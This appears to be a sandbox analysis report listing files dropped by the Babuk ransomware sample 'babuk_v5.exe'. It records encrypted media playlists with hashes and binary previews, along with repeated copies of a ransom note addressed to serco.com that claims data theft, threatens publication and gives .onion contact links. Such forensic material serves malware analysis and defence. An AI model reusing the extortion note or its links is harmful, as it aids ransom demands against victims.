                                                                            Preview: ..$.....e.:.I..}7.vwM-z.M6...u.._....H.......rNfn{...O}<8l..(.Y.U.\C+.H.pO.L..[.:.j5.7ju..u....f.2.-..;>.%..7E.V:..#_,...x.~r@=z.J...bP.2t...C.....|&...Ir..eg.'.=....a...'Ug..k...^.p...O1d0...<u./$.$....y..AQ~...I..M?.h-C.)M......%...Ga.(.:.uR...,...S..S...y.c...9..4Z...I...Ijw:....X../.7._..O2......<...vK.8..s........@K..lHK....p........fQT....|W.#,...s5..R....s.@.r.j/........V0.B.bvB.JR..u..].6.....]b...D...G[.uo.1I...YI.........^.*s?h.!.T..(.N..!Zu.=T...s...O.EJ.).I......~.{....dYv...&;}...3B.....;.;..q.F....(lS..e..,.....F..G_.6..a.......%....... .XJ..D......R.......~K,... ..F[-(!.)..Z.".S..p..$.@....R.w?=.....*...{....F...o......K.iZ.....[...z..%..8.)......5. ..".c<g..j@.w>..\.6EcB.n1%...W...]^..{.....?.w..e....f."./.L..Z..x3Z'.%.~.^..<m.f..~~|..........A..m...M.._.1....U.A...|k.m.9<..^#B,.!..X..W..P..z.Am.V....m..=d.......F#.....9.q...#.....OT..:..R...U6...z...".4v...g.NyF.#RDQJH...._.lQ.. ..zC D.W.i.EL.y../$..L..L...R.luf|.-.l+._4..^
                                                                            C:\Users\user\AppData\Local\Microsoft\Media Player\Sync Playlists\en-US\0002AD7C\02_Music_added_in_the_last_month.wpl.babyk
                                                                            Process:C:\Users\user\Desktop\babuk_v5.exe
                                                                            File Type:Unknown
                                                                            Category:dropped
                                                                            Size (bytes):1447
                                                                            Entropy (8bit):7.839619013613921
                                                                            Encrypted:false
                                                                            SSDEEP:24:feXSSJ0wt5xasyrKc7J/ZNgm9vIMa2ClmN1pSNlNmqPgVGrG0Ose6p3h80YBns:mxCwMDrKcVTPtI8C0JGNmYpOC80Yhs
                                                                            MD5:5313B091735CDF712A835C5B197959AF
                                                                            SHA1:BACA4C7AA9C05234F105C74CEA9F760919B1C6D9
                                                                            SHA-256:9C5DE65DAF5C01537725435B54C999310E440D524FAFDB08E9F9BE9753A5A342
                                                                            SHA-512:D077D0B1EC34CC33E5237AF84E6D328B1F591AC60F54B5EC63846BE3EA4A1E0AF8688F2C4C9FD9319BFC7420C95B71B7196DDB597AA6CB1AF6E9A0EA340BDC27
                                                                            Malicious:false
                                                                            Preview: ...e..7.V.b.6.5...!....j.....NA...@[..W.L..%...(..T.t..{..,{...L....JU...Bp%..}..J.}0..N._.}~8..gy.P.`.~o..1......([t....PcL...../...N...g..a....8F...\8}_e|...!.B..z.{G....E.....5.s{...G.!u<g. ..pUG<....'..!..EI..Q......".2))6....hf.C.-..k..Q..S..._....34.....tz.c..l.B..s|.~....i...IK.g.k.EO..Bo..T.}...37.5x...@....2....U+a}....hnrx.%..s.v.....Vn.K...p.t./...,....b...9hM$P!....4.n98.n...`....]Vt..;.Y..x="..:.%..Kd..A..B.(....b..x 3.......'i....J.n.,.'h..nN..l...0.OF;..".f.3.E.....I..w..T3........../U1.._...r...<.&.u*4\.s]^..........~.../4..8....]..~#.."...i.8..i..g...1.5R.8.S....w'.......u.$1l....Fq..7.t.x.>!..<.0.I..z2....a...d\s.7.E..rD....+..~f_s,..x....t.p....[..V....h..4.a..~J$.A<Afi.....p.!,{...U!..aPdW.../`..j....zW>..".\..h....A$..../.!z..KhY.-}...-.....^....~G0\P..E.[.....yO...h.c....e.....1...~3..@..R..A'...E..u.[~&eX.,... ?.....T....T. ..[..q](.x;..h>Zko....(QA....ib.4.....\..A..#K..'T2%..yj.;/..]...9a.wB...H0;....../<
                                                                            C:\Users\user\AppData\Local\Microsoft\Media Player\Sync Playlists\en-US\0002AD7C\03_Music_rated_at_4_or_5_stars.wpl.babyk
                                                                            Process:C:\Users\user\Desktop\babuk_v5.exe
                                                                            File Type:Unknown
                                                                            Category:dropped
                                                                            Size (bytes):1435
                                                                            Entropy (8bit):7.868758795898455
                                                                            Encrypted:false
                                                                            SSDEEP:24:O+JmnsKYJrzc+tDziLhVratnAHJ45uRulILE+syNtmO03wq:OkmnXGrrzsHra+uiu6LovOywq
                                                                            MD5:176074C6A049081A208C62F0CE52F1AD
                                                                            SHA1:B5311DCFCBC85FE97E559D58F14E64C6C0CA9FAE
                                                                            SHA-256:C2B69ED63402F59BA7458B2043728820AB27D98426318C2B99C7A2B6242C58EE
                                                                            SHA-512:C6C3ECFF7BA7D6FB5A61AB4CC6CFD85BCAA75ECFBDE29A5AFD8AA6540EE8C1D5CEA1A5747A9B1CC7E43BADE366C951A8D2B569F717AB7F3463E5B13F51D3D369
                                                                            Malicious:false
                                                                            Preview: .1.$.Sm.1....k..V.S..D)G..k.a...$..o..[..*-:..y.Q.K.!F.a<3....yu.V.'y$XDC....t.W....kw.V.+..[......O.......('.J1.,.e%.7B.~-.....".hT4`f.X..."..J..3.*.La.w.o9.e.8s....-6."vo.......KQ.e+..}.^.3d....].f.M..Y..erY..3S.Y.....{/...gr.U..R.....D..T...R....{:.=q.T("...j....G.M(..KaR.M.!...(z.h....o...%FL...Y....{..P.`.Q.#>...q9..<.....:....[.>...(...r:.e...N....O.):"....G.X..U..s...F.Pu.5M..N.j..qn..t...6.|=sE...r..-`A.o......t(.....)7-........}|.5...7B....O..u.t..#.u..)..L.5.0.......w?..>.o.Wy...A.b...X/h6.q..,P.<.2.J.........iC.....L5..G0..D...9...m.OK.,.%.......X+CoEr..b..'M....Bn..g.[.S.VB...l.....W....*..4$].k,?.D.6........R.8.-..C..H.-.P..3.U..$.L.....{.r.9...T..../...].\...Ds.....l.;.Z.#.N~..`..).W.j.......YR3./.....S.....(8G.w.W".L..P.z$..+....r7b.j...N.L.......U.. ..p...36...h...}h.H7.(.s.\n%.....@.j..J.........|1...4..k.q..hG.u\.vl..3dQS..dNr6.6...V.i.s..D*.6K+...9..&78..^.....o....S^7?....h7.x....M.......}.....[.Q....|xIc...T..A.V.St#8..O.S..
                                                                            C:\Users\user\AppData\Local\Microsoft\Media Player\Sync Playlists\en-US\0002AD7C\04_Music_played_in_the_last_month.wpl.babyk
                                                                            Process:C:\Users\user\Desktop\babuk_v5.exe
                                                                            File Type:Unknown
                                                                            Category:dropped
                                                                            Size (bytes):1452
                                                                            Entropy (8bit):7.84887411652016
                                                                            Encrypted:false
                                                                            SSDEEP:24:Bx+uK+3iXNaoL0VV5QOePgmRGTaFHjpLPN7PmyEHSYZMErfxsSilJywXNDtdmg8Y:GuTMkoLkVSOeYKljZN6n2Of2XJywXlH3
                                                                            MD5:47AD0CDE37A9AEBAF5CE373661648459
                                                                            SHA1:52C3279FC650CB279A6E18EA2F68CF2530643098
                                                                            SHA-256:7BAD6A6E9BE9D6835F1771B42D8E9A6D984413AB6C0F09845232B5E8C722FFBD
                                                                            SHA-512:0D0E9A00F2F5320BB3C6B57D7E37A424279B08564203A05AA975DC3E8D90991F0A51D015953294819CDE74EC4823EF0E03F7826DCD63AAF7E91E38C5A71C1D7F
                                                                            Malicious:false
                                                                            Preview: .*:..;.r..E.o...C..!...Qb......P....>.5.......x%V.....ygz.x.<.%.......f....HW......0..........5.Rh.&6V76.._`...QW^......B.(.uK.AE.{..".=...+.....!..E.@7]<.:..n..ae...C.8l.uf.P.1x..S.l.++G.D...H...eL.........C..V}..=...8.[.#...B.lVl....0t....-.P.Y..V..7[...|lP...2.81~n..a.{N......3Ny..|......L)u(vTd.D.....r..Fq3..u@]...]....:vW...B.....9H.....c..oi.$.....>.7..n...eJ......A.C.....U.4....27......B.Y:.o.[.!j...Db.+o.N,.:.ys....QV ._.pa...D.s.P6.......~...u.......v....,M..G.o..._8..u....?.N}..{..,C.........1..DA?..])..s...Mj...eb..C..U.C\............H..;...o..F.......0.n.3n"..I.]!Y........k.?...]...l...<....=...@........[..k...v..E...vAWs..e!.....1`.....o:._...#6.c.._.H......4Pe.X.......z..]FtdeK..,^`Wr....p.z.6V/.o.A`Yei.y.CRn....Pl0X.L.H...U.@...L..8|.i...\...Z.:.U....u....C.b...._....n.=2..%...yB.....R..O.......I.3..CG?o$..=..<...;O.q.....6=.l..r...>z....~j.-.3U?......iH.N.z.....#=1.]%.MC..d......J.w....Qmn.%.7..i.[]..d.j..yO.$DH... *...
                                                                            C:\Users\user\AppData\Local\Microsoft\Media Player\Sync Playlists\en-US\0002AD7C\05_Pictures_taken_in_the_last_month.wpl.babyk
                                                                            Process:C:\Users\user\Desktop\babuk_v5.exe
                                                                            File Type:Unknown
                                                                            Category:dropped
                                                                            Size (bytes):965
                                                                            Entropy (8bit):7.7671433751443715
                                                                            Encrypted:false
                                                                            SSDEEP:24:uy+QjPr7MJezI0VBAUunpJUdwgo4Ht558kOfME:uy7jT7MJWZ2E/VT8kqME
                                                                            MD5:74F31EE6D5F4BE0C0745A600DC8F7EC4
                                                                            SHA1:6A646B2BA563FF5D4F4D9E09B084BD2743A6C826
                                                                            SHA-256:9BCAA59FAA2A9CF5FFC8CF5CEA546055432BA8E7278EFD650C5498F179F70830
                                                                            SHA-512:07BC8EA2E6922379DC7CBD7AE9A772552709A080DE7788205689E0871822096DEBA5AD551E83C4F20D1CCC24786E3A4FEFE236150CA42ED7860E03788E36F3F3
                                                                            Malicious:false
                                                                            Preview: .A....1.v"...g....c..l..........!J.I......uG.?$9gG".../&..>)uB...}a....z.S.PF.=...B.9Lv.=.Sh..^.n@x.N.GB.H..R.,.n{-......AZ.......|...D...D2..<&..e.Vb.@......g..Z.&...Q...d.94..ws.b.Wz..z..+..m...DH.7.vf..gxg$;..&a.._&)&.h"...!".|.H=...U...m.\.`........)..VOe..>.j.Md....IBs]HK..^.g.Kpb;......$.....hG..N...u.&......>.../n.C.v(,.l"3....n.d..0=T,r|k..r....%..,9.oeu..;..;;..z..R.zr;..C.U.1a5?.\O.`.p..9....._.D\P...=.,*........u...M.1w.<....E"{..m..X.7p/.. .....2..o3......j..wi3.Z...9......7xZ....F.}.5.9..v.(:W{...A..z.F.C.\...i,..eD....8...+:zcQ!..vM._....cQ.9...8L....1.PD.m..]t|h.8.L8.....:U...b)...G....b.EH)....h...r.P{...#...q.Z.w3/.+.7e...[..o.1...iO....j.TdGu/..........%Z.*'...\Bd.L..(v.d.v......Z...U-....^.I...l....rm...a.. y.._...... +.&.D.........B.ED%..ok...#...._31x......U.Z`.T.W..H.X..2.r..Si..b:#I.L.....H.?u.....z..S.6I..-v:k.DS...........Nl.d*.h.Y.(h..e.j9..{.....choung dong looks like hot dog!!
                                                                            C:\Users\user\AppData\Local\Microsoft\Media Player\Sync Playlists\en-US\0002AD7C\06_Pictures_rated_4_or_5_stars.wpl.babyk
                                                                            Process:C:\Users\user\Desktop\babuk_v5.exe
                                                                            File Type:Unknown
                                                                            Category:dropped
                                                                            Size (bytes):953
                                                                            Entropy (8bit):7.7463496657368625
                                                                            Encrypted:false
                                                                            SSDEEP:24:1AABNcg16JbakaT67nHr0Jt+1MQR8LyyDDJxJZKGeX7:1AA7cgMbDaQMuILKZ
                                                                            MD5:75FD2BA44A344B1B727FA283B204E16B
                                                                            SHA1:681912204D04ABAF1A33A009D49812AA1F25F942
                                                                            SHA-256:FA3FED8E8C91DBBA9CFCDC92D5616A5527F91F0070CD695BD625F99A4619019D
                                                                            SHA-512:30070498EF1AB2840505A0B53CA146255D2EBB04B8AE89E91DDB176762FBD7B9AF8ADAFC0309101FCAFFEAA4965D113B6342AF639F34F6AE8242819EE9F523B8
                                                                            Malicious:false
                                                                            Preview: X.=D..Z.. .B..jv)....+|...6,n$.hf.*...D.I.....fW.B;.H.>W...*..b../...NR...^.f..Bjr..E.rdX.E~.....]$......v....RJ.:.g(..F....X.]...s..jj*....`..I.pJ..l&.'..0.M.........W^...l+....3uy.....{...5.Kx....e...o.\SO.m....bB.......+.A...a.(.j~......o....+.)....4|.o"g.(....B5:8l....;..G......x.|.<...!..2&...5.s.../.n../....k...v.=.WaM..U}2.$.....g.P5..I..IH^..v.w......7.j..Cq.s...I.Z.*....M..6..6...#~.r..:.. hV....{Q-....#...V.a?.;vS....E5(..H.4.Hu.e.Z.vkx.m.v....\.....)<...EH2.{U.Ev.H....!.....j...46L..2...9 ....`w...l.......p...M......*.P.....6....>t...).7.....sr].7..J.T.u)d.KyQ...c.._...\u....=..M..S.J?....v.3|.....2I].t.3'.}..........K.`.$%..t.^....x.r..r.?....%.}..!.....0..._.....;3..Lv.D*...K...rA...[w..V#..HW3.3C-9m.Qd.e. .........{..U?L..&z..-.t..Y..x];k.....P.H.E.k......Q.......y.......|...$..|B...K....N<....rk....v.!.../.@.X.h.7.O.wZ.o.J..M.b..-.U...a.....choung dong looks like hot dog!!
                                                                            C:\Users\user\AppData\Local\Microsoft\Media Player\Sync Playlists\en-US\0002AD7C\07_TV_recorded_in_the_last_week.wpl.babyk
                                                                            Process:C:\Users\user\Desktop\babuk_v5.exe
                                                                            File Type:Unknown
                                                                            Category:dropped
                                                                            Size (bytes):1208
                                                                            Entropy (8bit):7.816897546567165
                                                                            Encrypted:false
                                                                            SSDEEP:24:nDHV1bdX6SgdtBYamOfBgLywKuCAUk/Xnn6ebxdQPxL:DH96fLBIuBgLywKbSqebYL
                                                                            MD5:23FF065B072D288C80DD1A3C375816AE
                                                                            SHA1:6B305BC64F9D58040CB033523854B25D1C045D62
                                                                            SHA-256:42A8FC00F664E958B10D95702BB5FB2996789E4910D76CA7700CDB7FEE841313
                                                                            SHA-512:3803FDA0E86CB9F8255DD3D76AE78371CDAFC34D35477E2484AB2C1CFEE3C2B63285E15F3F198039F2C7805510ACAB6BDAE9D1C68808EFE0B5F59EE218EF53DE
                                                                            Malicious:false
                                                                            Preview: R....@;ao..F.Y.....Z..m.........>..U..a..&.n.......6"../..A..............m.....Md...b..M}...D$...1..........=.:.rI..:M....&.-..B.8s.,...NGPw.6...Pn........>......j...j'...X.["M....=d........B..o#K%..;B#'[...+.\...D .......6.3E..n29|.....]9.Avbk...T2.*...C1..'o.\;.dft.........T*u.Y0JZ.e...0........y..O....5....9...v....-c.D.qqeP.7..FK.4o......~P....;F...............m.."...Ql...z.._&.:Y C...s...T...P..:a.^..........k#.J..............2.s..............=Q..,..!.n%..y....6.9iPQ..2..D..c..hn..y.vd.[..I.......+........R1`.K.-.l.\..=>...*U.......O.-....YR....S.3....w.N...5..Z........rL.O.V..@Y..8fGi..V]..9.'..S..P....gC}....)e>..]-.2Q..%k.X..OS.dg..v.'.Q^.<.wmy.<...4S...T/^..lRq.A.....8.,.,](.X,%(;..\..M......L.Lu....e...-.....Av.X.A,XfK&'7..4......`L.K>S..Y=<..*..ITn..gc...nN...B.N.....:h.....`2...;....u.....1...=B.v....3M"2..(y&.....:u.....l.?;7.&s).....dM..;._...D\...w..f.....7.A..:....2...9.H.\n2..|..7.c>...K..U.W....F.!xd..T.F..._6.&_WL.
                                                                            C:\Users\user\AppData\Local\Microsoft\Media Player\Sync Playlists\en-US\0002AD7C\08_Video_rated_at_4_or_5_stars.wpl.babyk
                                                                            Process:C:\Users\user\Desktop\babuk_v5.exe
                                                                            File Type:Unknown
                                                                            Category:dropped
                                                                            Size (bytes):1188
                                                                            Entropy (8bit):7.814888381987446
                                                                            Encrypted:false
                                                                            SSDEEP:24:/SDfk8Sw9nRe78/EPtIiMoDYves6/xmH1oFh3LBRUFU4t4G:/SDfYw9nRe78cF1zDV/JmHyFbRUKVG
                                                                            MD5:BEC011EAC7DB918AA23AF73BC7E88A25
                                                                            SHA1:F20DFB7CCEFE03739B6B151F9702C77DF6CE47A1
                                                                            SHA-256:56D4FD0CFA63559087B6B36556CC0AB0C5E57F917534AFD5525866A7106C7780
                                                                            SHA-512:40E2289AA54E0F8E7288CADE1B293024D50D5785552054A1938C25A663DFD6EDF2FB00AF8EB83B00C9C992C7C87B7709BB25FCEA4B527420C278F5177CE866C5
                                                                            Malicious:false
                                                                            Preview: .....5a.....{.oT...l.P.i.S..p!..i....p..c../.I_.}">J..?...d.....j.4.2.....V................s^(=.[\...2`#.v..?.;U......CwE.1...F..p.'...4..,9.c.....Qhm.Y:;.v.x.4.S....@..x.yCb..^...... ...W.W.....,T...%i..DE.Zxq.e.........."i....[...c...J........fa....|.<U..h:. ..~...Y.U?=.0.={).x..Z ....p.y~J#K.b.........s.G....P.Sq.....9.]...x..,.B4.w.....dM..ub.t.&H..^....+...)CW].W6_PX{..a.uvN|OB6P/R.>.7..4.........S.H.C...AM8.....F...P..d..~K.....D8..d.)..:e..4L..M.kl,3w.]...a...?'*h.#..w.lbm..e-F@.H.,.9.#g.H.\.b..~?....._..u..z.......F,B.OAM..bg..i/..?BEF[.,Z.....jD.;.i20%...K..>.[.p..S.......@plD._.Z.2...]M@..C\....l..>\.\....l.4K.|........,..f.O..]Ms.Aj.%W".....VF..f.U...6.:.G_.-.....x.S......v.)w.PI..]..:....y[.AZ...m[.s.a._hY.x\..oJw.xa...Q,.S...W.L....T.-=:....8#..w..l....#.*.\..LG..F..Zt...^.....*.n.....T...w.....Sd.w.p...?-.xGpST...X.-0A-...4.".~LW.l..R..!.......#!.e7..$@.zH....ts..)!@.pA...Em2...s..4f._O.....DC.."...P.j<.',?...0h..:.?.
                                                                            C:\Users\user\AppData\Local\Microsoft\Media Player\Sync Playlists\en-US\0002AD7C\09_Music_played_the_most.wpl.babyk
                                                                            Process:C:\Users\user\Desktop\babuk_v5.exe
                                                                            File Type:Unknown
                                                                            Category:dropped
                                                                            Size (bytes):1193
                                                                            Entropy (8bit):7.825440189625794
                                                                            Encrypted:false
                                                                            SSDEEP:24:dYGc6H1QntUmUwkLBmDjbGvyysIiBR5xeA8u/KQW3GAzBBvUSxHT3:quHKtUmURMOvyb/eAl/56G8UIHj
                                                                            MD5:BB2C2CC528702860E5FAD4CC938B0AE3
                                                                            SHA1:D1D2D6E0841C4541B1D3F953B658EBA3F2C5911B
                                                                            SHA-256:AFC4DE637D8BECE1525543CAD88B9D3D9DBA2C3F827A293F138C0902C59EAE7E
                                                                            SHA-512:48C151BC6D730A184BADB067BCC255C161C3568BE46FFA5A85C0E5EBC2DCACD709D2E792BC2B50F703A718B478E39DF1CCEA4718DE998AB3760F9BA83EA8F4EE
                                                                            Malicious:false
                                                                            Preview: ...s.E].(..u.V.L..'.q...8s[_p:.....w.._..22.rbSH...`~..c......q........t..:....`.Cy{u]u.%...X..S...... .R.&..*.Q.J..]. ...y)..EFj..S..G.......V ...*...S..y..B.......H..cQ...`|..^.>...3...=...XlN.3u9..9^K.......f.wTn.2....^_9.g/)2./......A.d...b..U-*...B....bO*YW...o!O7....?...z....2u...w.lp.vM....-..6...\...{..t+.....\.k...QBt......?8..).k_0.Za.4u..o.h...N..,..Wz.z.W.R9!soKW..4 ....Z....k.....3.\.. ?7...@4..c....oa.S......GJ'..3........ .?t...`..A.b.[.]p..WmM.......0...k..1.u.....(._.s.|.>.IcrJF. U=~i.....A....G..5/fW9-t..(3...+)WmX.ca.>..G.....P.x@Y...u.Ok...7.4^..WM...|...."~...........>..dX....9I....g.~@...|...M.1.|.d}...K]....Q"~.f.0.H... ..c..z..z{..0..\...N..II..:>......X...m..a. `..bM%..2.i...<!UP.%3.J.......v...F*..X`d./i&23l.. ^7.X.&..."..>G.@.,o.k.o ...."U.I.._yz.".#..k..P....w..,v....>.O.@..0...]..yz..........$...^..G....u...c.....c..s2+...|D.H..L5....(.HA..VXQ.....eqS"X'...`.....(4.~.......J[%.F4..1..&......\&W..O.........Y8HI.
                                                                            C:\Users\user\AppData\Local\Microsoft\Media Player\Sync Playlists\en-US\0002AD7C\10_All_Music.wpl.babyk
                                                                            Process:C:\Users\user\Desktop\babuk_v5.exe
                                                                            File Type:Unknown
                                                                            Category:dropped
                                                                            Size (bytes):1231
                                                                            Entropy (8bit):7.813908417938988
                                                                            Encrypted:false
                                                                            SSDEEP:24:bozT3G1dwx/1oFXkxpOftpQwLwwVYU6Y1d/rNEcRacU1:b03obkx+t2OwwVwY1d/xlvU1
                                                                            MD5:A5FB5F17BAADB87D9FA06345C6F529E6
                                                                            SHA1:33CF8BDF842675EA471B13D038A5490C40122F1B
                                                                            SHA-256:F43ECAE13CDC33F9917F15BCE8BEDB37A12F3E84E6CB8C709DB092A97AE9FE63
                                                                            SHA-512:83BBB1D4E4CE0AAE40D9A390F806C22432200FA96D894A6017B5D0AEDF0C0625A8832C55BED846D15F487854F9555D2AFB5D87ACFC41F4A551C1A9054A2CBD94
                                                                            Malicious:false
                                                                            Preview: .}....`YiC.^.........o.J..........*3MX....u....`)..k.i..O.\.'."S..sx.....E....I.ip.,...*..7\%...G.a.m.....d"..Y..{g)5.K.3_p.....wC.Jo.........qz..$.X..-....1V..\.e.*....{.3P."...4".....k...."..#4.d"..X..-.ncY(..YF$.$...|......v..d....<.....Z....r.^?..+...e!.....bJ...\.....Q_.g.n..a......>.>.Q..x.-.l...... .)N..._....t.o.....A.>..n.E.c.n..,E.[aE....$.E.a..{]/..)}o..(.(.5.2.....R...F~........].f.]..0z..v...W..8>......x_...$.6?.......:.{l.......aK.K.>.u .A.^[.."hx...Hu.....&..'.h.g...n..A....Q7$.....~g.QAY.0k-.=U..kJ...m..."$...~:._.....w@..o...>L.II..9....(...c.......P...m(.%$.&L.>....q.\/g...N..e....k[...]....1s2....G?..D..%.b...H.r.....h.p.=..3...G..?....gQ+..4.S...i....*..H.|d....6k............f.....^.$6Ng..\....<...3I.u.E;...,.....4...N......../.Y'..k.`......O....._c..6.@......t.k4...7)..>H.].....Z-...zeu..W....(w.hX..q...0....LA......e..%k}C.[I.r.k..}.PY.E.sp....A(...........&Z.._.......D..Sf...0..8CH.mw.9.[Z...7:e..&.r..y:0.s....D.....#f..l
                                                                            C:\Users\user\AppData\Local\Microsoft\Media Player\Sync Playlists\en-US\0002AD7C\11_All_Pictures.wpl.babyk
                                                                            Process:C:\Users\user\Desktop\babuk_v5.exe
                                                                            File Type:Unknown
                                                                            Category:dropped
                                                                            Size (bytes):753
                                                                            Entropy (8bit):7.672034080018253
                                                                            Encrypted:false
                                                                            SSDEEP:12:QYpGqI96uxNgdFDny71zSbirRln1zig2cS3GV1xQogJbzzSaknCX5ZZK:Qao9hNQyoiH1zqDGV1xQ9xzzSRU5ZM
                                                                            MD5:0EDB8A1C09A06DBBF035EDCCC6689BB1
                                                                            SHA1:E50F3D770A30C09B21967A3A2CC5C3BA6A87107C
                                                                            SHA-256:A8A75D16BAFB1C1FF208EA4302E21ED1A2CC86878E4BD40C41167ABDD1C5946E
                                                                            SHA-512:C6FA36C786D6934C48FB81278E505895F9F7DBF9D5A934D5912C058ACD20206EEAE42FA2A43B712EF03FB51C680D4FC0D7106472DC3B2295A6114013B5B7A190
                                                                            Malicious:false
                                                                            Preview: ..<.....^..o;@....J...s..&..7.Z.Q1.s.2N5.`....a,=....".A}...ux..])J.../..R....t.... [1I........CZ.. :.tRM...*Vl.....HV...vc.3..eQ:.K.[.}.,A.x.0+dL!H.e!kc...4./...f.(c.t..&.m@...)...V.=.8Ud.-....,.U...u(Pi.....:s(jLPZ....m..+..{^...y?....?...*...}.......1N,.A...E*...*.A:...DF..e.%*z2.R.i.I.(S.........}./i{.....C...:?0]...2W.u...$.....(q...$...W.X....c:..:..E...sN^...".....?.5...M^.@..m...<.yU..[.S..U.......(.r.^.%xo.....L.]..,r{..6.?..%..'.P.$...q.....m........HY.....`....t1S1y..N...Z{9m^.._%.RV...&..$.x,.......3.O~p.[~.^.e.1S..a.....C.N.Vt...M............=.o....9d...$.!k.iq.h2....`C...,c...\..D.~......x_../.)...>@.f........T..H.{Fs...;.`.H.w...<;.*..Wy.i..X..dk.<....1.3....choung dong looks like hot dog!!
                                                                            C:\Users\user\AppData\Local\Microsoft\Media Player\Sync Playlists\en-US\0002AD7C\12_All_Video.wpl.babyk
                                                                            Process:C:\Users\user\Desktop\babuk_v5.exe
                                                                            File Type:Unknown
                                                                            Category:dropped
                                                                            Size (bytes):1247
                                                                            Entropy (8bit):7.831293715924999
                                                                            Encrypted:false
                                                                            SSDEEP:24:RXBufN7QlYdeExUl//vP0VDTDGSSeZaF7qMm/9SdTiRtp:juJmXPmvDGSSuaF7qMO9SMRtp
                                                                            MD5:2888EF809B96939B04B5D60A8F6CCC71
                                                                            SHA1:D5C9530BFC48A5A08752B8C2D0DB69BE56ABE7AD
                                                                            SHA-256:D0F4D6EC4150DB96213B3D0C95753A2ABF2F5AC3AEF1FF8BF6196957055CA3B7
                                                                            SHA-512:1FC82278BBF43D01F07ED1545A7B00AB12621B3A00A6927DD37958964E60C5E315709F17BBE066F8A3BC2FC9B7BF287CD50DFB09BFDABD2D0F6F0F14C527BC20
                                                                            Malicious:false
                                                                            Preview: CSi.]..T. .ps.a..S`..^......q..+~.=.~.'.@.W...O~'..vn...V.'..4.....n...Y.@....p.M..~...,'X._..EB../ $..I...Gs!.i.....&<...t..y.S..Q[..9...z.l.[.xM.J.t.;.se.Y.Ml`*.....DH.....vvl.....aY...}.k6S.~M...t...}.....,../R...g.u.q..o?...{...t..#~.1.....&S,.....t.D..'wG..........e..?....5.....-*......M).cn... ..am.VB.......:.>o.......j....p..5..3....e,.^c.m.>..}!.~..U..........@&..64i)^.}..u..D$.u.n.]_..BW..?...!0.|...WE.........2...(......z<T.n."...f.4..C{..O..j.].#....LPX..~..O...xd.....A......V.@c._D..C.H'....i.Y....Z../,.O......w'.G-.........<9....\..hF...$.[-G.:...6..,..At*l.O~..p..p9S%>G$e`...|~^.2.kc|.4...tG...X..G....z.....V._.'.E...JH....t....1...^.fC.}...>....n.j..}.#Z..6..._.&%... ..".T..8..i....}..J_......(C.U5..V..........#...xsb.....0...U.Z..3m...._.8G.94.....y._.5.^ .l....~...Cl0p.a..(.u...u.4../?..J.G.$.(......YY...B.fO._...'._..p.......G.....N.f[T.t..&.....i.......GVE.2C.D.+.%.R.7..@aw|.O.Xc...K=?...p......e.D.(...]._../...1.....]..I!
                                                                            C:\Users\user\AppData\Local\Microsoft\Media Player\Sync Playlists\en-US\0002AD7C\How To Restore Your Files.txt
                                                                            Process:C:\Users\user\Desktop\babuk_v5.exe
                                                                            File Type:Unknown
                                                                            Category:dropped
                                                                            Size (bytes):1916
                                                                            Entropy (8bit):4.893704863963044
                                                                            Encrypted:false
                                                                            SSDEEP:48:a3NuVOfDAggFky1lFrXdkNBHhYRKgbWIuIVI4IlIZeI6I9I8:aQEbASyFra/BYRtbTO9+Zj328
                                                                            MD5:8719A4F9E9FFD0B8B8B0B49134698B90
                                                                            SHA1:98CC50EEDEA6206A7EEDF8B8442AD9C10095B500
                                                                            SHA-256:DD5BA1629ECD99EE7B9F723E217D589E0FB7C84689973E5B5EFE45C5282BA7E7
                                                                            SHA-512:A1DDC7DF09EE37DAF0BDB04DAF0B509FA96D8F81D64D8582EEF65BE3707A0959D5E3BAC97C23598C66D5B912B4DCFFF4FB89B849E3599BBC68867092152416EF
                                                                            Malicious:false
                                                                            Preview: Hello! serco.com, we are the BABUK team and you have big security problems, we are not a government hackers, we are only interested in money. ..We've been surfing inside your network for about 3 weeks and copied more than 1 TB of your data. Down below you can see screenshots of the data we stole. We strongly recommend you to get us in touch and discuss the details of the future deal in our private chat: ....* How to contact us? ..---------------------------------------------- ..1) Download Tor browser: https://www.torproject.org/download/ ..2) Open it ..3) Follow this link in tor browser: http://babukq4e2p4wu4iq.onion/login.php?id=dKK7wnOiVHoXdqSrVcb1gxKpC9JICQ ......We can provide you any amount of proofs of data we stole, in case we do not come to any agreement or you won't text us in near five days, the data will be published in our blog. ....Links to this blog is private now, but how fast it become public depends only from you...http://gtmx56k4hutn3ikv.onion/?dUIel0o8kfjZf4zUHDbm..
                                                                            C:\Users\user\AppData\Local\Microsoft\Media Player\Sync Playlists\en-US\How To Restore Your Files.txt
                                                                            Process:C:\Users\user\Desktop\babuk_v5.exe
                                                                            File Type:Unknown
                                                                            Category:dropped
                                                                            Size (bytes):1916
                                                                            Entropy (8bit):4.893704863963044
                                                                            Encrypted:false
                                                                            SSDEEP:48:a3NuVOfDAggFky1lFrXdkNBHhYRKgbWIuIVI4IlIZeI6I9I8:aQEbASyFra/BYRtbTO9+Zj328
                                                                            MD5:8719A4F9E9FFD0B8B8B0B49134698B90
                                                                            SHA1:98CC50EEDEA6206A7EEDF8B8442AD9C10095B500
                                                                            SHA-256:DD5BA1629ECD99EE7B9F723E217D589E0FB7C84689973E5B5EFE45C5282BA7E7
                                                                            SHA-512:A1DDC7DF09EE37DAF0BDB04DAF0B509FA96D8F81D64D8582EEF65BE3707A0959D5E3BAC97C23598C66D5B912B4DCFFF4FB89B849E3599BBC68867092152416EF
                                                                            Malicious:false
                                                                            Preview: Hello! serco.com, we are the BABUK team and you have big security problems, we are not a government hackers, we are only interested in money. ..We've been surfing inside your network for about 3 weeks and copied more than 1 TB of your data. Down below you can see screenshots of the data we stole. We strongly recommend you to get us in touch and discuss the details of the future deal in our private chat: ....* How to contact us? ..---------------------------------------------- ..1) Download Tor browser: https://www.torproject.org/download/ ..2) Open it ..3) Follow this link in tor browser: http://babukq4e2p4wu4iq.onion/login.php?id=dKK7wnOiVHoXdqSrVcb1gxKpC9JICQ ......We can provide you any amount of proofs of data we stole, in case we do not come to any agreement or you won't text us in near five days, the data will be published in our blog. ....Links to this blog is private now, but how fast it become public depends only from you...http://gtmx56k4hutn3ikv.onion/?dUIel0o8kfjZf4zUHDbm..
                                                                            C:\Users\user\AppData\Local\Microsoft\Media Player\Transcoded Files Cache\How To Restore Your Files.txt
                                                                            Process:C:\Users\user\Desktop\babuk_v5.exe
                                                                            File Type:Unknown
                                                                            Category:dropped
                                                                            Size (bytes):1916
                                                                            Entropy (8bit):4.893704863963044
                                                                            Encrypted:false
